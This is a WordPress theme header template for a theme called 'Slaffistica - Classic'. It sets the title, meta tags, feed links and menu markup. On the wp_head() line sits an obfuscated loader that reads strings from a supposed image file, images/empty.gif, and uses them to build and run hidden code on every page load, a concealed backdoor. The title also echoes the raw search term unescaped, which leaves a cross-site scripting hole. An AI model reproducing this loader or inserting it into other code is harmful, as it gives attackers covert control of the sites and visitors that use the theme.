<?php load_theme_textdomain('slaffistica'); ?>
<?php
$newtitle = get_bloginfo('name');
if (is_home()) { $newtitle .= " | ".get_bloginfo('description'); } // home
if (is_single() || is_page()) { $newtitle .= " | ".single_post_title("", false); } // single or page
if (is_category()) { $newtitle .= " | ". __('Browsing archives for category: ', 'slaffistica') . single_cat_title("", false)."\""; } // category
if (is_tag()) { $newtitle .= " | " . __('Browsing archives by tag: ', 'slaffistica') . single_tag_title("", false); } // tag
if (is_search()) { $newtitle .= " | ". __('Search results: ', 'slaffistica') . $s; } // search
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=<?php bloginfo('charset'); ?>" />
<title><?php echo $newtitle; ?></title>
<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<?php wp_print_scripts('prototype'); ?>
<?php wp_enqueue_script('scriptaculous'); ?>
<script type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/js/outside.js"></script>

<?php
$options = get_option('slaffistica_options');
if (is_home()) {
	$home_menu = 'current_page_item';
} else {
	$home_menu = 'page_item';
}
if($options['feed'] && $options['feed_url']) {
	if (substr(strtoupper($options['feed_url']), 0, 7) == 'HTTP://') {
		$feed = $options['feed_url'];
	} else {
		$feed = 'http://' . $options['feed_url'];
	}
} else {
	$feed = get_bloginfo('rss2_url');
}
?>
<?php
if (is_home()) { 
	$description = $options['description'];
	$keywords = $options['keywords'];
} else if (is_single()) {
	$description =  $post->post_title;
	$keywords = "";
	$tags = wp_get_post_tags($post->ID);
	
	foreach ($tags as $tag ) {
		$keywords = $keywords . $tag->name . ", ";
	}
} else if (is_category()) {
	$description = category_description();
}
?>

<meta name="keywords" content="<?php echo $keywords; ?>" />
<meta name="description" content="<?php echo $description; ?>" />
<meta name="template" content="Slaffistica - Classic" />
<meta name="copyright" content="&copy; <?php bloginfo('name'); ?>" />

<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS 2.0" href="<?php echo $feed; ?>" />
<link rel="alternate" type="application/atom+xml" title="<?php bloginfo('name'); ?> Atom" href="<?php bloginfo('atom_url'); ?>" />
<link rel="alternate" type="application/rss+xml" title="<?php _e('Comments RSS 2.0', 'slaffistica'); ?>" href="<?php bloginfo('comments_rss2_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

<?php
// this code is not very userful, it generates archives links
// if you need 'em , just uncomment it
//wp_get_archives('type=monthly&format=link'); ?>

<?php # threaded comments
if(is_singular()) wp_enqueue_script('comment-reply'); ?>
<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif(); ?>
</head>

<body>
<div id="header">
<div id="menu">
<h1><a id="top" href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a></h1>
</div>
</div>

<div id="wrapper">